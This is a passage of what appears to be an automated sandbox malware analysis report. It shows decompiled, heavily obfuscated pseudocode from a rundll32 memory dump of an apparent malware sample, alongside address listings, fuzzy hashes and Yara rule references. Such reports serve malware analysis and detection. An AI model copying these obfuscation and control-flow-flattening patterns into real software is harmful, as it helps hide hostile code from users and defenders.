                                                                                                                      0x0069426c
                                                                                                                      0x00694274
                                                                                                                      0x00694279
                                                                                                                      0x00694281
                                                                                                                      0x00694289
                                                                                                                      0x0069428e
                                                                                                                      0x00694296
                                                                                                                      0x0069429b
                                                                                                                      0x006942a3
                                                                                                                      0x006942ab
                                                                                                                      0x006942b3
                                                                                                                      0x006942bb
                                                                                                                      0x006942c0
                                                                                                                      0x006942c8
                                                                                                                      0x006942d0
                                                                                                                      0x006942d8
                                                                                                                      0x006942dc
                                                                                                                      0x006942e4
                                                                                                                      0x006942f4
                                                                                                                      0x006942f9
                                                                                                                      0x006942ff
                                                                                                                      0x0069430c
                                                                                                                      0x00694314
                                                                                                                      0x0069431c
                                                                                                                      0x00694324
                                                                                                                      0x0069432c
                                                                                                                      0x00694334
                                                                                                                      0x00694339
                                                                                                                      0x00694341
                                                                                                                      0x00694349
                                                                                                                      0x00694355
                                                                                                                      0x0069435a
                                                                                                                      0x00694360
                                                                                                                      0x00694368
                                                                                                                      0x00694370
                                                                                                                      0x00694378
                                                                                                                      0x00694380
                                                                                                                      0x00694388
                                                                                                                      0x00694390
                                                                                                                      0x00694398
                                                                                                                      0x006943a0
                                                                                                                      0x006943a8
                                                                                                                      0x006943b0
                                                                                                                      0x006943b8
                                                                                                                      0x006943c0
                                                                                                                      0x006943cc
                                                                                                                      0x006943cf
                                                                                                                      0x006943d3
                                                                                                                      0x006943d7
                                                                                                                      0x006943df
                                                                                                                      0x006943df
                                                                                                                      0x006943f1
                                                                                                                      0x006944da
                                                                                                                      0x00000000
                                                                                                                      0x006943f7
                                                                                                                      0x006943f9
                                                                                                                      0x006944b8
                                                                                                                      0x006944c1
                                                                                                                      0x006944c6
                                                                                                                      0x006944c8
                                                                                                                      0x006944cb
                                                                                                                      0x006944ce
                                                                                                                      0x006944d0
                                                                                                                      0x00000000
                                                                                                                      0x006944d0
                                                                                                                      0x006943ff
                                                                                                                      0x00694405
                                                                                                                      0x0069445e
                                                                                                                      0x0069446a
                                                                                                                      0x0069447b
                                                                                                                      0x0069447f
                                                                                                                      0x00694485
                                                                                                                      0x00694489
                                                                                                                      0x0069448e
                                                                                                                      0x00000000
                                                                                                                      0x00694407
                                                                                                                      0x0069440d
                                                                                                                      0x0069450a
                                                                                                                      0x00694513
                                                                                                                      0x0069451e
                                                                                                                      0x00694525
                                                                                                                      0x00694527
                                                                                                                      0x00694529
                                                                                                                      0x0069452f
                                                                                                                      0x00694531
                                                                                                                      0x00694531
                                                                                                                      0x0069452b
                                                                                                                      0x0069452b
                                                                                                                      0x0069452d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069452d
                                                                                                                      0x00694529
                                                                                                                      0x00694413
                                                                                                                      0x00694413
                                                                                                                      0x00694419
                                                                                                                      0x00000000
                                                                                                                      0x0069441f
                                                                                                                      0x00694430
                                                                                                                      0x00694434
                                                                                                                      0x00694438
                                                                                                                      0x0069443d
                                                                                                                      0x00694442
                                                                                                                      0x00694448
                                                                                                                      0x00000000
                                                                                                                      0x00694448
                                                                                                                      0x00694442
                                                                                                                      0x00694419
                                                                                                                      0x0069440d
                                                                                                                      0x00694405
                                                                                                                      0x006943f9
                                                                                                                      0x00694535
                                                                                                                      0x0069453e
                                                                                                                      0x0069453e
                                                                                                                      0x006944f1
                                                                                                                      0x006944f6
                                                                                                                      0x006944f7
                                                                                                                      0x006944fc
                                                                                                                      0x006944fc
                                                                                                                      0x006944fc
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,a$`2$?
                                                                                                                      • API String ID: 0-2087061617
                                                                                                                      • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                      • Instruction ID: 336251c86e366cb716171f02d24cfc6fb19619779e69f2eefa1edbfb4aec287a
                                                                                                                      • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                      • Instruction Fuzzy Hash: 04A122725083419FC758CF65C48A80BFBF6FBC5758F008A1DF69996260D7B5890ACF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006859F2 Relevance: 4.0, Strings: 3, Instructions: 202COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006859F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E00683C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E0069DA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E0069DCF7(_v1068, 0x681000, __eflags);
									_pop(_t222);
									_t209 =  *0x6a3e10; // 0x0
									_t237 =  *0x6a3e10; // 0x0
									E006847CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E0068A8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E006A13AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}










































                                                                                                                      0x006859f2
                                                                                                                      0x006859f8
                                                                                                                      0x00685a02
                                                                                                                      0x00685a0a
                                                                                                                      0x00685a0f
                                                                                                                      0x00685a1b
                                                                                                                      0x00685a1d
                                                                                                                      0x00685a21
                                                                                                                      0x00685a29
                                                                                                                      0x00685a31
                                                                                                                      0x00685a39
                                                                                                                      0x00685a41
                                                                                                                      0x00685a4d
                                                                                                                      0x00685a50
                                                                                                                      0x00685a54
                                                                                                                      0x00685a5c
                                                                                                                      0x00685a64
                                                                                                                      0x00685a74
                                                                                                                      0x00685a78
                                                                                                                      0x00685a80
                                                                                                                      0x00685a88
                                                                                                                      0x00685a8d
                                                                                                                      0x00685a99
                                                                                                                      0x00685a9e
                                                                                                                      0x00685aa4
                                                                                                                      0x00685aac
                                                                                                                      0x00685ab4
                                                                                                                      0x00685abc
                                                                                                                      0x00685ac4
                                                                                                                      0x00685acc
                                                                                                                      0x00685ad9
                                                                                                                      0x00685ada
                                                                                                                      0x00685ae3
                                                                                                                      0x00685ae7
                                                                                                                      0x00685aef
                                                                                                                      0x00685af7
                                                                                                                      0x00685aff
                                                                                                                      0x00685b07
                                                                                                                      0x00685b0f
                                                                                                                      0x00685b14
                                                                                                                      0x00685b1c
                                                                                                                      0x00685b24
                                                                                                                      0x00685b28
                                                                                                                      0x00685b30
                                                                                                                      0x00685b38
                                                                                                                      0x00685b40
                                                                                                                      0x00685b45
                                                                                                                      0x00685b4d
                                                                                                                      0x00685b55
                                                                                                                      0x00685b63
                                                                                                                      0x00685b67
                                                                                                                      0x00685b6f
                                                                                                                      0x00685b77
                                                                                                                      0x00685b84
                                                                                                                      0x00685b88
                                                                                                                      0x00685b95
                                                                                                                      0x00685b99
                                                                                                                      0x00685ba1
                                                                                                                      0x00685ba9
                                                                                                                      0x00685bae
                                                                                                                      0x00685bb6
                                                                                                                      0x00685bbe
                                                                                                                      0x00685bc8
                                                                                                                      0x00685bd5
                                                                                                                      0x00685be2
                                                                                                                      0x00685bea
                                                                                                                      0x00685bf2
                                                                                                                      0x00685bfa
                                                                                                                      0x00685c02
                                                                                                                      0x00685c0a
                                                                                                                      0x00685c12
                                                                                                                      0x00685c1a
                                                                                                                      0x00685c1f
                                                                                                                      0x00685c27
                                                                                                                      0x00685c2f
                                                                                                                      0x00685c34
                                                                                                                      0x00685c39
                                                                                                                      0x00685c41
                                                                                                                      0x00685c49
                                                                                                                      0x00685c57
                                                                                                                      0x00685c5a
                                                                                                                      0x00685c5e
                                                                                                                      0x00685c66
                                                                                                                      0x00685c6e
                                                                                                                      0x00685c76
                                                                                                                      0x00685c7e
                                                                                                                      0x00685c86
                                                                                                                      0x00685c8e
                                                                                                                      0x00685c96
                                                                                                                      0x00685ca3
                                                                                                                      0x00685ca7
                                                                                                                      0x00685caf
                                                                                                                      0x00685caf
                                                                                                                      0x00685cc1
                                                                                                                      0x00685dc8
                                                                                                                      0x00685cc7
                                                                                                                      0x00685cc9
                                                                                                                      0x00685d69
                                                                                                                      0x00685d6e
                                                                                                                      0x00685d71
                                                                                                                      0x00000000
                                                                                                                      0x00685ccf
                                                                                                                      0x00685cd1
                                                                                                                      0x00685ce3
                                                                                                                      0x00685cec
                                                                                                                      0x00685cf4
                                                                                                                      0x00685cfa
                                                                                                                      0x00685d05
                                                                                                                      0x00685d1c
                                                                                                                      0x00685d2f
                                                                                                                      0x00685d3e
                                                                                                                      0x00685d43
                                                                                                                      0x00685d46
                                                                                                                      0x00000000
                                                                                                                      0x00685cd3
                                                                                                                      0x00685cd9
                                                                                                                      0x00000000
                                                                                                                      0x00685cdf
                                                                                                                      0x00685cdf
                                                                                                                      0x00000000
                                                                                                                      0x00685cdf
                                                                                                                      0x00685cd9
                                                                                                                      0x00685cd1
                                                                                                                      0x00685cc9
                                                                                                                      0x00685dd0
                                                                                                                      0x00685ddc
                                                                                                                      0x00685ddc
                                                                                                                      0x00685d78
                                                                                                                      0x00685d80
                                                                                                                      0x00685d81
                                                                                                                      0x00685d90
                                                                                                                      0x00685d97
                                                                                                                      0x00685d9b
                                                                                                                      0x00685d9d
                                                                                                                      0x00685da0
                                                                                                                      0x00685da5
                                                                                                                      0x00685da5
                                                                                                                      0x00685da5
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &($&($%.
                                                                                                                      • API String ID: 0-466442461
                                                                                                                      • Opcode ID: 805e37f5e4878e0a9a88b438be5a4ea332ee7e2362672b8cf53149aa0cd22cbc
                                                                                                                      • Instruction ID: 94bc709f51e2631d4b964d0e96b271fa5dc3664ee6cc9c10e45c2ca3dfb87ce2
                                                                                                                      • Opcode Fuzzy Hash: 805e37f5e4878e0a9a88b438be5a4ea332ee7e2362672b8cf53149aa0cd22cbc
                                                                                                                      • Instruction Fuzzy Hash: 70A130B11083819FC798DF26C58941BFBF2FBC4758F108A1DF5A696220D7B58A0ACF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006A13AD Relevance: 3.9, Strings: 3, Instructions: 169COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E006A13AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E006920B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E00684B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E00684B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E00684B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E00683BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E00683BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E00684DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}









                                                                                                                      0x006a13ae
                                                                                                                      0x006a13b9
                                                                                                                      0x006a13be
                                                                                                                      0x006a13c1
                                                                                                                      0x006a13c4
                                                                                                                      0x006a13c5
                                                                                                                      0x006a13c6
                                                                                                                      0x006a13cb
                                                                                                                      0x006a13cf
                                                                                                                      0x006a13d3
                                                                                                                      0x006a13da
                                                                                                                      0x006a13e1
                                                                                                                      0x006a13e8
                                                                                                                      0x006a13ef
                                                                                                                      0x006a13f2
                                                                                                                      0x006a13f9
                                                                                                                      0x006a1404
                                                                                                                      0x006a140b
                                                                                                                      0x006a1412
                                                                                                                      0x006a1415
                                                                                                                      0x006a141c
                                                                                                                      0x006a1423
                                                                                                                      0x006a142a
                                                                                                                      0x006a1431
                                                                                                                      0x006a1438
                                                                                                                      0x006a143c
                                                                                                                      0x006a1440
                                                                                                                      0x006a1447
                                                                                                                      0x006a144e
                                                                                                                      0x006a1455
                                                                                                                      0x006a145c
                                                                                                                      0x006a1460
                                                                                                                      0x006a1467
                                                                                                                      0x006a146e
                                                                                                                      0x006a1475
                                                                                                                      0x006a147c
                                                                                                                      0x006a1483
                                                                                                                      0x006a148a
                                                                                                                      0x006a1491
                                                                                                                      0x006a1498
                                                                                                                      0x006a149f
                                                                                                                      0x006a14a6
                                                                                                                      0x006a14ad
                                                                                                                      0x006a14b4
                                                                                                                      0x006a14bb
                                                                                                                      0x006a14bf
                                                                                                                      0x006a14c6
                                                                                                                      0x006a14cd
                                                                                                                      0x006a14d4
                                                                                                                      0x006a14db
                                                                                                                      0x006a14e2
                                                                                                                      0x006a14e9
                                                                                                                      0x006a14f0
                                                                                                                      0x006a14f4
                                                                                                                      0x006a14f8
                                                                                                                      0x006a14ff
                                                                                                                      0x006a1506
                                                                                                                      0x006a1513
                                                                                                                      0x006a151a
                                                                                                                      0x006a1525
                                                                                                                      0x006a1528
                                                                                                                      0x006a152f
                                                                                                                      0x006a1536
                                                                                                                      0x006a153d
                                                                                                                      0x006a1544
                                                                                                                      0x006a1548
                                                                                                                      0x006a154f
                                                                                                                      0x006a1556
                                                                                                                      0x006a155a
                                                                                                                      0x006a1561
                                                                                                                      0x006a1568
                                                                                                                      0x006a156f
                                                                                                                      0x006a1576
                                                                                                                      0x006a157a
                                                                                                                      0x006a1581
                                                                                                                      0x006a158a
                                                                                                                      0x006a1591
                                                                                                                      0x006a159e
                                                                                                                      0x006a159f
                                                                                                                      0x006a15a2
                                                                                                                      0x006a15a6
                                                                                                                      0x006a15ad
                                                                                                                      0x006a15b4
                                                                                                                      0x006a15c0
                                                                                                                      0x006a15c3
                                                                                                                      0x006a15c6
                                                                                                                      0x006a15cd
                                                                                                                      0x006a15d4
                                                                                                                      0x006a15df
                                                                                                                      0x006a15e2
                                                                                                                      0x006a15e9
                                                                                                                      0x006a15f0
                                                                                                                      0x006a15f7
                                                                                                                      0x006a15fe
                                                                                                                      0x006a1609
                                                                                                                      0x006a160c
                                                                                                                      0x006a1613
                                                                                                                      0x006a1616
                                                                                                                      0x006a161b
                                                                                                                      0x006a161c
                                                                                                                      0x006a1629
                                                                                                                      0x006a1632
                                                                                                                      0x006a163f
                                                                                                                      0x006a1648
                                                                                                                      0x006a164d
                                                                                                                      0x006a1661
                                                                                                                      0x006a1666
                                                                                                                      0x006a167c
                                                                                                                      0x006a1684
                                                                                                                      0x006a1687
                                                                                                                      0x006a168d
                                                                                                                      0x006a1693
                                                                                                                      0x006a1696
                                                                                                                      0x006a169c
                                                                                                                      0x006a16b0
                                                                                                                      0x006a16ba
                                                                                                                      0x006a16c4
                                                                                                                      0x006a16cc

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !h$5M$d,
                                                                                                                      • API String ID: 0-3324333736
                                                                                                                      • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                      • Instruction ID: f7036d69ced8bb6203fad6c1e9236df0eb42dea3b208df54c18865453da4f76c
                                                                                                                      • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                      • Instruction Fuzzy Hash: E991CEB140038C9BCF58DF65C98A9DE3FB1BB04358F509219FE2A96260D7B5C999CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069DEDC Relevance: 3.9, Strings: 3, Instructions: 162COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
